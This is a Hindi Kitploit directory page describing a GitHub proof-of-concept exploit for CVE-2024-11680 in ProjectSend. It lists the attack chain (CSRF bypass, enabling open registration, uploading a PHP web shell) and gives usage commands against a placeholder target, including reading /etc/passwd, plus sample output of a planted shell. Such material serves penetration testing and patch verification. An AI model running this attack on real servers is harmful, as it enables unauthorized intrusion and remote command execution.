Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-11680 — इस रिपॉजिटरी में CVE-2024-11680 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो ProjectSend r1605 और पुराने संस्करणों में एक महत्वपूर्ण भेद्यता है। शोषण गलत विशेषाधिकार सेटिंग्स और कमांड इंजेक्शन की समस्याओं के कारण गलत प्रमाणीकरण के उद्देश्य से है। | Kitploit
उपकरण/GitHubGitHub/qucklecrabik/cve-2024-11680
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

इस रिपॉजिटरी में CVE-2024-11680 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो ProjectSend r1605 और पुराने संस्करणों में एक महत्वपूर्ण भेद्यता है। शोषण गलत विशेषाधिकार सेटिंग्स और कमांड इंजेक्शन की समस्याओं के कारण गलत प्रमाणीकरण के उद्देश्य से है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

ProjectSend CVE-2024-11680 शोषण

यह CVE-2024-11680 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण है, जो ProjectSend में एक अप्रमाणित कॉन्फ़िगरेशन संशोधन और वेब शेल अपलोड कमजोरी है।

विवरण

यह शोषण ProjectSend में कई कमजोरियों का लाभ उठाता है:

  • CSRF टोकन बायपास जो कॉन्फ़िगरेशन परिवर्तनों की अनुमति देता है
  • असुरक्षित क्लाइंट पंजीकरण सेटिंग्स
  • अप्रतिबंधित फ़ाइल अपलोड जो दूरस्थ कोड निष्पादन की ओर ले जाती है

आवश्यकताएँ

  • Python 3.x
  • आवश्यक Python पैकेज:
    root@kitploit:~
    pip install requests colorama
    

उपयोग

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

तर्क

  • -u, --url: लक्ष्य URL (उदा., http://target.com/projectsend)
  • -c, --command: लक्ष्य पर निष्पादित करने का आदेश (डिफ़ॉल्ट: id)
  • उदाहरण

    root@kitploit:~
    # Python संस्करण प्राप्त करें
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # निर्देशिका सामग्री सूचीबद्ध करें
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # सिस्टम जानकारी प्राप्त करें
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # passwd फ़ाइल पढ़ें
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    यह कैसे काम करता है

    1. जासूसी: CSRF टोकन प्राप्त करता है और लक्ष्य कमजोरी की पुष्टि करता है
    2. कॉन्फ़िगरेशन हेरफेर: असुरक्षित क्लाइंट पंजीकरण विकल्पों को सक्षम करता है
    3. उपयोगकर्ता पंजीकरण: स्व-अनुमोदन के साथ एक नया क्लाइंट खाता बनाता है
    4. फ़ाइल अपलोड: .phtml एक्सटेंशन के साथ एक PHP वेब शेल अपलोड करता है
    5. कमांड निष्पादन: अपलोड किए गए शेल के माध्यम से निर्दिष्ट आदेशों को निष्पादित करता है

    विशेषताएँ

    • स्वचालित CSRF टोकन निष्कर्षण
    • यादृच्छिक उपयोगकर्ता क्रेडेंशियल उत्पादन
    • स्मार्ट फ़ाइल नामकरण और टाइमस्टैम्प पहचान
    • बेहतर दृश्यता के लिए रंगीन आउटपुट
    • अंतर्निहित कमांड निष्पादन क्षमता

    कानूनी नोटिस

    यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।

    संदर्भ

    • CVE-2024-11680

    उदाहरण आउटपुट

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    टूल डाउनलोड करें